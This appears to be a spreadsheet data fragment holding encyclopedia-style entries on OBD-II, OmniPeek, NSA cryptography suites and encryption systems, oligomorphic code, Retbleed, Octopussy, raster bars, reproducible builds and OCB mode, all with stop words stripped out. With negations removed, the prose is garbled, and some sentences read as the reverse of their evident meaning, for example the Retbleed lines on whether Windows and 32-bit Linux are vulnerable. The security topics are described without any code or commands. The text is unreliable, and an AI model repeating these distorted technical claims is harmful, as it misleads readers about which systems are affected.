standards documents standards documents obd-ii j1962 defines physical connector used obd-ii interface. j1850 defines serial data protocol. there variants: 10.4 kbit/s (single wire, vpw) 41.6 kbit/s wire, pwm). mainly used manufacturers, also known (chrysler, 10.4k), class (gm, 10.4k), (ford, 41.6k) j1978 defines minimal operating standards obd-ii scan tools j1979 defines standards diagnostic test modes j2012 defines standards trouble codes definitions. j2178-1 defines standards network message header formats physical address assignments j2178-2 gives data parameter definitions j2178-3 defines standards network message frame single byte headers j2178-4 defines standards network messages three byte headers* j2284-3 defines 500k physical data link layer j2411 describes gmlan (single-wire can) protocol, used newer vehicles. often accessible connector newer vehicles. standards documents (heavy duty) j1939 defines data protocol heavy duty commercial vehicles standards 9141: road vehicles diagnostic systems. international organization standardization, 1989. part requirements interchange digital information part carb requirements interchange digital information part verification communication vehicle scan tool 11898: road vehicles controller area network (can). international organization standardization, 2003. part data link layer physical signalling part high-speed medium access unit part low-speed, fault-tolerant, medium-dependent interface part time-triggered communication 14230: road vehicles diagnostic systems keyword protocol 2000, international organization standardization, 1999. part physical layer part data link layer part application layer part requirements emission-related systems 15031: communication vehicle external equipment emissions-related diagnostics, international organization standardization, 2010. part general information case definition part guidance terms, definitions, abbreviations acronyms part diagnostic connector related electrical circuits, specification part external test equipment part emissions-related diagnostic services part diagnostic trouble code definitions part data link security 15765: road vehicles diagnostics controller area networks (can). international organization standardization, 2004. part general information part network layer services 15765-2 part implementation unified diagnostic services (uds can) part requirements emissions-related systems security issues researchers university washington university california examined security around obd, found able gain control many vehicle components interface. furthermore, able upload firmware engine control units. their conclusion vehicle embedded systems designed security mind.there reports thieves using specialist reprogramming devices enable steal cars without key. primary causes vulnerability tendency vehicle manufacturers extend purposes designed, lack authentication authorization specifications, instead rely largely security obscurity. also obd-ii pids ("parameter ids") unified diagnostic services engine control unit immobiliser references notes external links directive 98/69/ec european parliament council october 1998. national clearing house center automotive science technology weber state university united states environmental protection agency information repair technicians, vehicle owners, manufacturers</t>
  </si>
  <si>
    <t>OmniPeek</t>
  </si>
  <si>
    <t>omnipeek packet analyzer software tool savvius, liveaction company, network troubleshooting protocol analysis. supports application programming interface (api) plugins. history savvius (formerly wildpackets) founded 1990 group mahboud zabetian mccreery. 2000 company changed name wildpackets address popular market developed products. first product company written macintosh called etherpeek. first affordable software-only protocol analyzer ethernet networks. later ported microsoft windows, released 1997. earlier, localpeek tokenpeek developed localtalk token ring networks respectively. 2001, airopeek released, added support wireless ieee 802.11 (marketed wi-fi brand) networks. 2003, omniengine distributed capture engine released software, hardware network recorder appliance. early morning july 2002, wildpackets' building walnut creek, california burnt ground including everything however, hurt employees regrouped location company survived fire.mid-april 2015, company changed name wildpackets savvius broadened focus include network security.in june 2018, savvius acquired liveaction, company provides network performance management, visualization analytics software. acquisitions savvius acquired net3 group november 2000. their product, netsense, expert system network troubleshooting, converted initially converted plug-in later fully integrated version product called etherpeeknx.savvius acquired optimized engineering corporation 2001. optimized network analysis instructors, training courses certifications added savvius' services. extensibility omnipeek apis front-end automation, back-end analysis, well mechanisms extend enhance program. body.sayed there plug-ins available omnipeek platform. these plug-ins range logging extensions full-blown applications hosted omnipeek. remote adapters: provide means capture packets stats. there remote adapters capture rmon, netflow, sflow, cisco ap's, aruba ap's, linux boxes. adapters available aggregate packets multiple network segments wireless channels time. notable decoders protospecs decoder files, interpreted text files extended user enhance display analysis existing protocols, knowledge completely protocols, without releasing versions application.the plugin wizards omnipeek console omniengine microsoft visual studio project templates generate working plug-ins. when wizard run, dialog appears providing options types functionality sample code generated for. when wizard complete, user left working plugin entry points adding application logic. these plug-in wizards enable development extensions omnipeek. mypeek community portal website dedicated extension omnipeek. provides plug-ins, scripts, adapters, tools, various levels support plug-ins posted there, expertise interested extending omnipeek themselves.placemap: freely available standalone google maps packet sniffer application windows captures network traffic maps nodes google map. placemap notable example extensibility uses exactly google plugin also available omnipeek, uses peek driver capture packets. example plugins google plugin nodes google sqlfilter plugin save query packets database peekplayer plugin send packet adapter capture window powerbar plugin write scripts process packets decoder plugin decode packets watchme plugin display sites real-time urls browser plugin construct display pages packets plugin display instant message screen names chat webstats plugin collect report statistics remote tcpdump adapter plugin stream packets machine tcpdump cisco remote adapter plugin stream packets cisco access points aruba remote adapter plugin stream packets aruba networks monitors references external links https://www.liveaction.com network world, sept. 2006: review wildpackets' omnipeek. anthony mosco, robert smithers, robert tarpley network world april 2007: wlan analyzers: wildpackets' omnipeek windows 4.1. henderson, rand dvorak week. network week, 2006, dave bailey. wildpackets' latest omnipeek tool makes easier inspect traffic troubleshoot networks. tested: wildpackets omnipeek enterprise network world, march 2008: clear choice test voip analysis tools. smithers miercom cisco website, mar. 2006: lwapp decodes enablement wildpackets omnipeek etherpeek software</t>
  </si>
  <si>
    <t>NSA Suite A Cryptography</t>
  </si>
  <si>
    <t>suite cryptography cryptography "contains classified algorithms released." "suite used protection categories especially sensitive information small percentage overall national security-related information assurance market)." incomplete list suite algorithms: accordion baton firefly joseki keesee mayfly medley mercator saville shillelagh walburn weasel also commercial national security algorithm suite suite cryptography references generalnsa suite cryptography cryptographic interoperability</t>
  </si>
  <si>
    <t>Oligomorphic code</t>
  </si>
  <si>
    <t>oligomorphic code generally used computer virus generate decryptor comparable simple polymorphic code. randomly selecting piece decryptor several predefined alternatives. pieces used build decryptor usually common detected signatures. however, oligomorphic viruses able generate hundred different decryptors, detecting simple signatures still possible. another method detect oligomorphic decryptor make signature possible piece code, group pieces substitute together scan file chain decryptor pieces alternating groups. emulation used detect virus, take resources necessary. also timeline notable computer viruses worms polymorphic code metamorphic code self-modifying code alphanumeric shellcode shellcode software cracking security cracking obfuscated code</t>
  </si>
  <si>
    <t>NSA Suite B Cryptography</t>
  </si>
  <si>
    <t>suite cryptography cryptographic algorithms promulgated national security agency part cryptographic modernization program. serve interoperable cryptographic base unclassified information classified information. suite announced february 2005. corresponding unpublished algorithms, suite "used applications suite appropriate. both suite suite used protect foreign releasable information, us-only information, sensitive compartmented information (sci)."in 2018, replaced suite commercial national security algorithm suite (cnsa).suite components were: advanced encryption standard (aes) sizes bits. traffic flow, used either counter mode (ctr) bandwidth traffic galois/counter mode (gcm) mode operation high bandwidth traffic (see block cipher modes operation) symmetric encryption elliptic curve digital signature algorithm (ecdsa) digital signatures elliptic curve diffie–hellman (ecdh) agreement secure hash algorithm (sha-256 sha-384) message digest general information nist, recommendation pair-wise establishment schemes using discrete logarithm cryptography, special publication 800-56a suite cryptography standards 5759, suite certificate certificate revocation list (crl) profile 6239, suite cryptographic suites secure shell (ssh) 6379, suite cryptographic suites ipsec 6460, suite profile transport layer security (tls)these downgraded historic references 8423. history december 2006, submitted internet draft implementing suite part ipsec. this draft accepted publication ietf 4869, later made obsolete 6379. certicom corporation ontario, canada, purchased blackberry limited 2009, holds elliptic curve patents, licensed united states government use. these include patents ecmqv, ecmqv dropped suite previously released patent restrictions. also 6090. october 2012, cnssp-15 stated 256-bit elliptic curve (specified fips 186-2), sha-256, 128-bit keys sufficient protecting classified information secret level, 384-bit elliptic curve (specified fips 186-2), sha-384, 256-bit keys necessary protection secret information. however, august 2015, indicated secret algorithm strengths used protect levels classified information.in 2018 withdrew suite favor cnsa. quantum resistant suite august 2015, announced planning transition distant future" cipher suite resistant quantum attacks. "unfortunately, growth elliptic curve bumped fact continued progress research quantum computing, necessitating re-evaluation cryptographic strategy." advised: "for partners vendors made transition suite algorithms, recommend making significant expenditure point instead prepare upcoming quantum resistant algorithm transition." standards estimated published around 2024. algorithm implementation using algorithm suitable encrypt information necessarily sufficient properly protect information. algorithm executed within secure device encryption keys vulnerable disclosure. reason, federal government requires nist-validated encryption algorithms, also executed validated hardware security module (hsm) provides physical protection keys and, depending validation level, countermeasures electronic attacks differential power analysis side-channel attacks. example, using aes-256 within fips 140-2 validated module sufficient encrypt government sensitive, unclassified data. this notion applies algorithms. commercial national security algorithm suite suite algorithms replaced commercial national security algorithm (cnsa) suite algorithms: advanced encryption standard (aes), fips 197, using keys protect secret elliptic curve diffie-hellman (ecdh) exchange, fips 800-56a, using curve p-384 protect secret. elliptic curve digital signature algorithm (ecdsa), fips 186-4 secure hash algorithm (sha), fips 180-4, using sha-384 protect secret. diffie-hellman (dh) exchange, 3526, minimum 3072-bit modulus protect secret establishment (nist 800-56b digital signatures (fips 186-4), minimum 3072-bit modulus protect secret also cryptography references</t>
  </si>
  <si>
    <t>NSA cryptography</t>
  </si>
  <si>
    <t>vast majority national security agency's work encryption classified, time time participates standards processes otherwise publishes information cryptographic algorithms. categorized encryption items four product types, algorithms suites. following brief incomplete summary public knowledge algorithms protocols. type product type product refers endorsed classified controlled cryptographic item classified sensitive u.s. government information, including cryptographic equipment, assembly component classified certified encrypting decrypting classified sensitive national security information appropriately keyed. type product type product refers endorsed unclassified cryptographic equipment, assemblies components sensitive unclassified u.s. government information. type product unclassified cryptographic equipment, assembly, component used, appropriately keyed, encrypting decrypting unclassified sensitive u.s. government commercial information, protect systems requiring protection mechanisms consistent standard commercial practices. type algorithm refers nist endorsed algorithms, registered fips published, sensitive unclassified u.s. government commercial information. type product type algorithm refers algorithms registered nist fips published. unevaluated commercial cryptographic equipment, assemblies, components neither nist certified government usage. algorithm suites suite unpublished algorithms intended highly sensitive communication critical authentication systems. suite endorsed cryptographic algorithms interoperable cryptographic base unclassified information classified information. suite announced february 2005, phased 2016. commercial national security algorithm suite cryptographic algorithms promulgated national security agency replacement suite cryptography post-quantum cryptography standards promulgated. quantum resistant suite august 2015, announced planning transition distant future" cipher suite resistant quantum attacks. "unfortunately, growth elliptic curve bumped fact continued progress research quantum computing, necessitating re-evaluation cryptographic strategy." advised: "for partners vendors made transition suite algorithms, recommend making significant expenditure point instead prepare upcoming quantum resistant algorithm transition." also encryption systems speck simon, light-weight block ciphers, published 2013 references</t>
  </si>
  <si>
    <t>NSA encryption systems</t>
  </si>
  <si>
    <t>national security agency took responsibility u.s. government encryption systems formed 1952. technical details nsa-approved systems still classified, much early systems become known modern systems share least features commercial products. rotor machines 1940s 1950s mechanical marvels. first generation electronic systems quirky devices cantankerous punched card readers loading keys failure-prone, tricky-to-maintain vacuum tube circuitry. late 20th century systems black boxes, often literally. fact called blackers parlance convert plaintext classified signals (red) encrypted unclassified ciphertext signals (black). they typically electrical connectors signals, black signals, electrical power, port loading keys. controls limited selecting fill, normal operation, diagnostic modes important zeroize button erases classified information including keys perhaps encryption algorithms. 21st century systems often contain sensitive cryptographic functions single, tamper-resistant integrated circuit supports multiple algorithms allows over-the-air network keying, single hand-held field radio, an/prc-148 an/prc-152, interoperate current cryptosystems. security factors deal many factors ensuring security communication information (comsec infosec jargon): confidentiality authentication making sure messages cannot read unauthorized people cannot forged (nonrepudiation). little publicly known algorithms developed protecting classified information, calls type algorithms. 2003, first time history, approved published algorithms, skipjack type approved systems. traffic flow security making sure adversary cannot obtain information traffic analysis, often accomplished link encryption. management getting keys securely thousands crypto boxes field, perhaps challenging part encryption system. goal benign fill (technology distributing keys humans never access plaintext key). investigative access making sure encrypted communications accessible u.s. government. while would argue need government access internal communications, clipper chip proposal extend escrow requirement public cryptography highly controversial. tempest protecting plaintext compromise electronic, acoustic emanations. tamper resistance, tamper-evident, self-destruct ensuring security even encryption systems physically accessed without authorization captured. meeting military specifications size, weight, power consumption, mtbf ruggedness mobile platforms. electromagnetic pulse hardening protecting nuclear explosion effects, particularly electromagnetic pulse. ensuring compatibility military commercial communication standards. controlling cost making sure encryption affordable units need there many costs beyond initial purchase price, including manpower operate maintain systems ensure security cost distribution. enabling secure communication nato, allied coalition forces without compromising secret methods. five generations encryption large number encryption systems developed half century operation grouped five generations (decades given approximate): first generation: electromechanical first generation systems introduced 1950s built legacy nsa's world predecessors used rotor machines derived sigaba design high level encryption; example, kl-7. distribution involved distribution paper lists described rotor arrangements, changed (the cryptoperiod) midnight, gmt. highest level traffic sent using one-time tape systems, including british 5-uco, required vast amounts paper tape keying material.: second generation: vacuum tubes second generation systems (1970s) electronic designs based vacuum tubes transformer logic. algorithms appear based linear-feedback shift registers, perhaps non-linear elements thrown make difficult cryptanalyze. keys loaded placing punched card locked reader front panel. cryptoperiod still usually day. these systems introduced late 1960s stayed mid-1980s. they required great deal care maintenance, vulnerable emp. discovery walker ring provided impetus retirement, along remaining first generation systems. third generation: integrated circuits third generation systems (1980s) transistorized based integrated circuits likely used stronger algorithms. they smaller reliable. field maintenance often limited running diagnostic mode replacing complete unit spare, defective sent depot repair. keys loaded connector front panel. adopted type connector military used field radio handsets fill connector. keys initially distributed strips punched paper tape could pulled hand held reader (koi-18) connected fill port. other, portable electronic fill devices (kyk-13, etc.) available well. fourth generation: electronic distribution fourth generation systems (1990s) commercial packaging electronic distribution. integrated circuit technology allowed backward compatibility third generation systems. security tokens, ksd-64 crypto ignition (cik) introduced. secret splitting technology allows encryptors ciks treated unclassified separated. later fortezza card, originally introduced part controversial clipper chip proposal, employed tokens. cryptoperiods much longer, least user concerned. users secure telephones like stu-iii call special phone number year encryption updated. public methods (firefly) introduced electronic management (ekms). keys could generated individual commands instead coming courier. common handheld fill device (the an/cyz-10) introduced replace plethora devices used load keys many third generation systems still widely used. encryption support provided commercial standards ethernet, (originally developed dod's arpa), optical fiber multiplexing. classified networks, siprnet (secret internet protocol router network) jwics (joint worldwide intelligence communications system), built using commercial internet technology secure communications links "enclaves" classified data processed. care taken ensure insecure connections classified networks public internet. fifth generation: network-centric systems twenty-first century, communication increasingly based computer networking. encryption aspect protecting sensitive information systems, challenging aspect. nsa's role increasingly provide guidance commercial firms designing systems government use. haipe solutions examples type product (e.g., kg-245a kg-250 other agencies, particularly nist, taken role supporting security commercial sensitive unclassified applications. nsa's certification unclassified nist-selected algorithm classified approved systems" suggests that, future, non-classified algorithms. kg-245a kg-250 classified unclassified algorithms. information assurance directorate leading department defense cryptographic modernization program, effort transform modernize information assurance capabilities 21st century. three phases: replacement risk devices replaced. modernization integrate modular programmable/embedded crypto solutions. transformation compliant global information grid/netcentric requirements.nsa helped develop several major standards secure communication: future narrow band digital terminal (fnbdt) voice communications, high assurance internet protocol interoperability encryption- interoperability specification (haipe) computer networking suite encryption algorithms. encryption type application large number encryption systems developed grouped application: record traffic encryption during world written messages (known record traffic) encrypted line special, highly secret, rotor machines transmitted five letter code groups using morse code teletypewriter circuits, decrypted off-line similar machines end. sigaba rotor machine, developed continued used mid-1950s, replaced kl-7, rotors. kw-26 romulus second generation encryption system wide could inserted teletypewriter circuits traffic encrypted decrypted automatically. used electronic shift registers instead rotors became popular (for comsec device era), 14,000 units produced. replaced 1980s compact kg-84, turn superseded kg-84-interoperable kiv-7. fleet broadcast u.s. navy ships traditionally avoid using radios prevent adversaries locating direction finding. navy also needs maintain traffic security, radio stations constantly broadcasting stream coded messages. during world navy ships copied fleet broadcasts used specialized call sign encryption devices figure messages intended them. messages would decoded line using sigaba kl-7 equipment. second generation kw-37 automated monitoring fleet broadcast connecting line radio receiver teleprinter. turn, replaced compact reliable third generation kw-46. strategic forces responsibility protect command control systems nuclear forces. kg-3x series used u.s. government's minimum essential emergency communications network fixed submarine broadcast system used transmission emergency action messages nuclear national command control u.s. strategic forces. navy replacing kg-38 used nuclear submarines kov-17 circuit modules incorporated long-wave receivers, based commercial packaging. 2004, u.s. force awarded contracts initial system development demonstration (sdd) phase program update legacy generation systems used aircraft. trunk encryption modern communication systems multiplex many signals wideband data streams transmitted optical fiber, coaxial cable, microwave relay, communication satellites. these wide-band circuits require fast encryption systems. walburn family (kg-81, kg-94/194, kg-94a/194a, kg-95) equipment consists high-speed bulk encryption devices used primarily microwave trunks, high-speed land-line circuits, video teleconferencing, satellite channels. another example kg-189, support sonet optical standards gbit/s. digital data encryptors kg-84 family includes tsec/kg-84, tsec/kg-84a tsec/kg-82, tsec/kg-84a tsec/kg-84c, also kiv-7. voice encryption true voice encryption opposed less secure scrambler technology) pioneered world 50-ton sigsaly, used protect highest level communications. become practical widespread reasonable compact speech encoders became possible mid-1960s. first tactical secure voice equipment nestor family, used limited success vietnam war. other voice systems include:: p.57ff these systems expensive cumbersome generally limited highest levels command stu-iii these telephone sets operated ordinary telephone lines featured security tokens public cryptography, making much user friendly. they popular result. used since 1980s, device rapidly phased out, longer supported near future. 1910 terminal made multiple manufacturers, device mostly used secure modem. like stu-iii, technology largely eclipsed device, longer widely used. hy-2 vocoder long haul circuits designed work kg-13 generator. secure terminal equipment (ste) this system intended replace stu-iii. uses wide-bandwidth voice transmitted isdn lines. there also version communicate pstn (public switched telephone network) line. communicate stu-iii phones upgraded fnbdt compatibility. sectéra secure module module connects back commercial shelf cellular phone. uses scip encryption. omni omni terminal, made communications, another replacement stu-iiis. this device uses fnbdt used securely send voice data pstn isdn communication systems. vinson series systems tactical voice encryption including ky-57 portable unit ky-58 aircraft have quick sincgars nsa-supplied sequence generators provide secure frequency hopping future narrowband digital terminal (fnbdt) referred "secure communications interoperability protocol" (scip), fnbdt replacement wide-band ste, uses narrow-bandwidth communications channels like cellular telephone circuits, rather isdn lines. fnbdt/scip operates application layer iso/osi reference model, meaning used different types connections, regardless establishment method. negotiates unit end, much like dial-up modem. secure iridium helped encryption iridium commercial mobile phones rescued bankrupt iridium. fishbowl 2012, introduced enterprise mobility architecture intended provide secure voip capability using commercial grade products android-based mobile phone called fishbowl allows classified communications commercial wireless networks.the operational complexity secure voice played role september 2001 attacks united states. according commission, effective u.s. response hindered inability secure phone link national military command center federal aviation administration personnel dealing hijackings. communication september 2001 attacks. internet approved variety devices securing internet protocol communications. these used secure secret internet protocol router network (siprnet), among uses. first commercial network layer encryption device motorola network encryption system (nes). system used protocols defined secure data network system (sdns) direct precursors ipsec. built three part architecture used small cryptographic security kernel separate trusted untrusted network protocol stacks.the sdns program defined message security protocol (msp) built x.509 defined certificates. first hardware built application safekeeper. message security protocol successor ietf privacy enhance mail (pem) protocol. safekeeper provided high degree tamper resistance first devices used commercial companies. field authentication still supports simple paper encryption authentication systems field dryad. public systems participated development several encryption systems public use. these include: suite public algorithm standards based elliptic curve cryptography. advanced encryption standard (aes) encryption algorithm, selected nist public competition. 2003, certified type nsa-approved systems. secure hash algorithm widely used family hash algorithms developed based earlier designs rivest. digital signature algorithm data encryption standard (des) skipjack cipher developed clipper finally published 1998. clipper chip controversial failure convinced advisable stay public arena. security-enhanced linux strictly encryption system, recognition 21st century, operating system improvements vital information security better ciphers. speck simon light-weight block ciphers, published 2013. references sources official site jerry proc crypto machine page brooke clarke crypto machines site telecommunications security (tsec) nomenclature system history u.s. communications security; david boak lectures, national security agency (nsa), volumes 1973, volumes 1981, partially released 2008, additional portions declassified october 2015</t>
  </si>
  <si>
    <t>Retbleed</t>
  </si>
  <si>
    <t>retbleed speculative execution attack x86-64 processors, including recent intel chips. first made public 2022, variant spectre vulnerability exploits retpoline, intended mitigation speculative execution attacks.according researchers retbleed mitigations require extensive changes system results performance loss linux affected intel respectively. works intel core 6th, generation microarchitectures microarchitectures. official document informs cpus affected spectre also affected retbleed.windows vulnerable existing mitigations already tackle linux kernels 5.18.14 5.19 contain fixes. 32-bit linux kernel, vulnerable, receive updates issue. references external links retbleed: arbitrary speculative code execution return instructions original retbleed proof concept github</t>
  </si>
  <si>
    <t>Octopussy (software)</t>
  </si>
  <si>
    <t>octopussy, also known 8pussy, free open-source computer-software monitors systems, constantly analyzing syslog data generate transmit central octopussy server (thus often called siem solution). therefore, software like octopussy plays important role maintaining information security management system within iso/iec 27001-compliant environments. octopussy ability monitor device supports syslog protocol, servers, routers, switches, firewalls, load balancers, important applications services. main purpose software alert administrators users different kinds events, like system outages, attacks systems errors applications. however, unlike nagios icinga, octopussy state-checker therefore problems cannot resolved within application. software also makes prescription whatsoever messages must be/must analyzed. such, octopussy seen less powerful popular commercial software category (event monitoring analysis).octopussy compatible many linux system distributions like debian, ubuntu, opensuse, centos, rhel even meta-distributions gentoo arch linux. although octopussy originally designed linux, could ported unix variants like freebsd minimal effort. octopussy extensive report generating features also various interfaces software, like e.g. nsca (nagios), jabber/xmpp zabbix. with help software like snare even windows eventlogs processed.octopussy licensed terms general public license. characteristics although octopussy free open-source software variety characteristics also found professional enterprise applications like splunk, sawmill kiwi syslog. octopussy features time writing, octopussy comes following features: basic ldap support (v1.0+) octopussy users contacts filter mechanism alert sending email, (jabber), nsca (nagios) zabbix functionality show system infrastructure known octopussy exportable reports email, input output plugins manual automatic reports report scheduling automated report generation based parameters viewer search syslog messages received octopussy rrdtool provide data graphing syslog activity enabled services comprehensive service definitions (apache bind, kernel ...) wizard easily create services and/or message patterns existing services option enable disable services alerts every system surveillance online updates services, tables l18n (language support) multi-language support: english french german italian spanish portuguese russian web-interface viewing current devices status, alerts, messages, etc. themable interface report documents manageability octopussy core services operating system shell flat-text formatted configuration files (integrates many configuration editors) option timely rotate store received syslog messages various locations user management ability granular permission configuration simple outline styles components easy modification supported services some (meta-)services supported by/known octopussy are: apache bind, kernel, pam, system, cisco routers (asr), cisco switches, clamav, denyall reverse proxy, drbd, bigip, fortinet hp-tools, ironport mailserver, juniper netscreen juniper netscreen nsm, ldap, linux apparmor, linux auditd, linux iptables, linux kernel, linux pam, linux system, monit, mysql, nagios, neoteris/juniper netapp netcache, postfix, postgresql, samba, samhain, snmpd, squid, sshd, syslog-ng, tacacs, vmware esx(i), windows snare agent, windows system, processible events events receivable services thus processible octopussy include: failed and/or successful logins, especially higher privileged users violation access permissions policies applications operating systems write and/or read access critical environments, e.g. apparmor selinux established terminated tunnels systems, like e.g. juniper netscreen objects like processes files security context configuration changed started stopped processes operating system level critical system states like (unrecoverable) hardware software failure change operating system state boot, reboot shutdown information regarding network connections/traffic, including icmp messages, etc. detection otherwise handling malware (i.e. worms, viruses, trojans) dependencies software requires rsyslog installed syslog-server expects systems monitored numerous available syslog services, like e.g. syslogd/klogd, rsyslog syslog-ng.the software depends apache http server installed, apache::asp, mod_perl mod_ssl. octopussy also requires mysql dbms (actual database installed/copied octopussy setup) well recent perl interpreter installed operating system, variety perl modules cpan (e.g. crypt::passwdmd5, dbd::mysql, json, unix::syslog, xml::simple). comprehensive list modules found within software packages/archives readme.txt file. addition nscd rrdtool requirement. rrdtool aids creation graphs displayed octopussy dashboard shown per-device/per-service level. architecture octopussy receives syslog messages syslog protocol therefore behaves passively, running type network agent remote machines monitoring/surveillance. octopussy completely conforms 3164 3195 ietf, describing syslog logging mechanism unix-like/bsd operating systems. that especially includes internal representation facility severity-principle applicable. software driven semi-stateful event correlation engine. this means engine records thus knows internal state, uses extent link together logically related elements device, order draw conclusion (i.e. generate alert). octopussy semi-stateful correlation engine, called sliding window shifting window logical boundary number events certain period time), capable comparing known past events present ones based limited number comparative values. octopussy dispatcher octo-dispatcher component used octopussy software receive syslog lines rsyslog dispatch device directories. every device registered activated within octopussy gets syslog messages assigned depending device name. noteworthy also adjacent octo-replay component, program used octopussy software replay messages device service receives processes recognized logs puts back incoming directory). octopussy parser octo-parser octo-uparser octopussy's important core components. octo-parser program used octopussy software parse logs syslog format device registered within octopussy. basically uses regex-engine commences pattern matching incoming syslog messages. octo-uparser restarted every time device's services changed, check previously received "unknown" messages associated service. cases octo-pusher also called advance process non-syslog messages incoming devices. regard, device setting "asynchronous" helpful process messages, sent octopussy server using e.g. ftp, rsync ssh/scp. octopussy interface octopussy interface (gui) default user-interface provides configuration management, device service management well alert definition therefore extends octopussy core components. devices displayed tabular form devices page, following descriptors minimum: hostname, address, type, device model/type, fqdn hence, interface (octo-web) mainly provides access octopussy core components like octo-commander, octo-message-finder, octo-reporter octo-statistic-reporter. octopussy front-end/gui written perl employing apache::asp structure display content.in addition that, octopussy core services also accessed operating system shell. that represents convenient administrators start/stop services make fundamental configuration changes. octopussy octopussy graph generator core component software installed default. since generation graphs resource intensive administrators disable octopussy syslog server less powerful amount ram. generated graphs displays activity active services monitored devices, highly depending specific service. after restart octopussy software operation, octo-dispatcher octo-parser always process syslog messages buffer queue first graph generation delayed. octo-rrd depends octo-scheduler, execute octopussy::report function order generate syslog activity graphs, scheduled previously. finally octo-sender capability send report data arbitrary recipients. extensions there plug-in/module system octopussy, mainly geared towards modification octopussy reports. such plug-in consists description file, defines plug-in name functions, code file perl code process actual data.there also extensions software related octopussy, like e.g. nagios plug-in checks octopussy core services (i.e. octo-dispatcher, octo-scheduler, etc.) well octopussy parser states partitions. services patterns creation services service patterns presents important extend octopussy without making changes source code. however, since patterns outlined simplified regular expressions, administrators least basic knowledge regex general. strongly recommended build already existing services also understand meaning message objects' basic fields, message pattern, level, taxonomy, table rank.usually logs wizard used search system unrecognized syslog messages device generate service patterns. during process creation patterns enables octopussy distinguish messages based severity taxonomy. also management intelligence splunk enterprise analysis software comparison network monitoring systems analysis software list analytics software references external links official website octopussy github octopussy documentation github octopussy sourceforge</t>
  </si>
  <si>
    <t>Raster bar</t>
  </si>
  <si>
    <t>raster (also referred rasterbar copperbar) effect used demos older video games displays animated bars colour, usually horizontal, additionally might extend border, a.k.a. otherwise unalterable area (assuming overscan) display. raster bar-style effects common atari 2600 atari 8-bit family (because could easily displayed using hardware systems) later demos commodore amiga, atari spectrum amstrad cpc. term copperbar comes graphics coprocessor amiga home computer referred copper shortened form coprocessor). programmed change display colors scan line without requiring cpu, except update position bars frame. horizontal raster bars such computers limited graphical abilities usually fixed number colours inks (e.g. maximum amstrad cpc) could displayed time, often assigned colour look-up table (clut), maps displayable colour larger selection possible colours (palette) hardware capable (e.g. cpc). raster bars similar effects (e.g. uses different colours playing area) achieved changing entries clut specific times screen drawn (originally electron beam), order display different colours subsequent portion screen. basic raster simply affects single scanline changing value clut colour covering line electron draws changes back previous colour line finished. using multiple colours succession carefully gradating changes, effect metallic-looking horizontal bars achieved. many graphics chips trigger interrupt, specifically called raster interrupt, horizontal blanking interval vertical sync begins; thus, interrupt handler precisely time perform task updating clut entries raster bars colour-changing effects. vertical raster bars similar effect generated vertically, although often extend border area. generate vertical bars, line video memory repeatedly output every scanline. frame, video memory typically blank, every horizontal blanking interval updated "bar" slightly different position, creating "stepped" effect. code examples rasterbars bytes (commodore various rasterbar effects (commodore</t>
  </si>
  <si>
    <t>Reproducible builds</t>
  </si>
  <si>
    <t>reproducible builds, also known deterministic compilation, process compiling software ensures resulting binary code reproduced. source code compiled using deterministic compilation always output binary.reproducible builds part chain trust; source code signed, deterministic compilation prove binary compiled trusted source code. methods compilation process deterministic, input compiler must same, regardless build environment used. this typically involves normalizing variables change, order input files, timestamps, locales, paths. additionally, compilers must introduce non-determinism themselves. this sometimes happens using hash tables random hash seed value. also happen using address variables varies address space layout randomization (aslr). build systems, bazel gitian, used automate deterministic build processes. history project used reproducible builds early 1990s. changelogs 1992 indicate ongoing effort.one older projects promote reproducible builds bitcoin project gitian. later, 2013, (anonymity network) project started using gitian reproducible builds.in july 2013 debian project started implementing reproducible builds across entire package archive.by july 2017 packages repository proven build reproducibly.in november 2018, reproducible builds project joined software freedom conservancy.f-droid uses reproducible builds provide guarantee distributed apks claimed free source code.the tails portable operating system uses reproducible builds explains others verify distribution.nixos claims 100% reproducible build june 2021. challenges according reproducible builds project, timestamps "the biggest source reproducibility issues. many build tools record current date time... archive formats happily record modification times timestamps." they recommend better date relevant source code instead build: software always built later" reproducible. they identify several ways modify build processes this: source_date_epoch environment variable number seconds since january 1970, using something source code. tools support environment variable value (when set) instead current date time. post-process output remove timestamps normalize them. tool strip-nondeterminism often help this. library like libfaketime intercept requests current time provide controlled response.in cases changes must made make build process reproducible. example, data structures guarantee stable order execution. typical solution modify build process specify sorted output structures. references external links reproducible-builds.org debian reproducible builds</t>
  </si>
  <si>
    <t>OCB mode</t>
  </si>
  <si>
    <t>offset codebook mode (ocb mode) authenticated encryption mode operation cryptographic block ciphers. mode designed phillip rogaway, credits mihir bellare, john black, krovetz assistance comments designs. based integrity-aware parallelizeable mode (iapm) authenticated encryption charanjit jutla. ocb2 version proven insecure, original ocb1 well ocb3 2011 still considered secure. encryption authentication mode designed provide message authentication privacy. essentially scheme integrating message authentication code (mac) operation block cipher. way, mode avoids need systems: authentication encryption privacy. this results lower computational cost compared using separate encryption authentication functions. there three versions ocb: ocb1, ocb2 ocb3. ocb1 published 2001. ocb2 improves ocb1 allowing associated data included message, providing authenticated encryption associated data (aead; data encrypted authenticated) method generating sequence offsets. ocb2 first published 2003, originally named authenticated-encryption mode, advanced encryption mode (aem) shown completely insecure 2019. ocb3, published 2011, changes offsets computed introduces minor performance improvements. mode listed optional method ieee 802.11 wireless security standard alternative counter cbc-mac mode (ccm). ocb2 standardized iso/iec 19772:2009 modified ocb3 7253. encodes length internally formatted nonce. performance performance overhead minimal compared classical, non-authenticating modes like cipher block chaining. requires block cipher operation block encrypted authenticated message, block cipher operation block associated data. there also extra block cipher operation required process. comparison, mode offering similar functionality requires twice many block cipher operations message block (associated data requires one, ocb). patents u.s. patents issued mode. however, special exemption granted allowing mode used software licensed general public license without cost, well non-commercial, non-governmental application. this constraint hindered approval national institute standards technology. since authors applied patent protection u.s., algorithm free software developed sold inside u.s.by january 2013, author granted free license open source license certified open source initiative.the u.s. patents intentionally abandoned 2021. attacks niels ferguson pointed collision attacks ocb, limits amount data securely processed single terabytes.in october 2018, inoue minematsu presented existential forgery attack ocb2 requires single prior encryption query almost computational power storage. attack extend ocb1 ocb3, requires associated data field forged ciphertext empty. poettering iwata improved forgery attack full plaintext recovery attack couple days later. four authors later produced joint report. also block cipher mode operation mode mode mode galois/counter mode references rogaway, phillip; bellare, mihir; black, john (august 2003). "ocb: block-cipher mode operation efficient authenticated encryption". transactions information system security. (3): 365–403. doi:10.1145/937527.937529. retrieved 2018-01-30. external links homepage nist: modes development</t>
  </si>
  <si>
    <t>Remote keyless system</t>
  </si>
  <si>
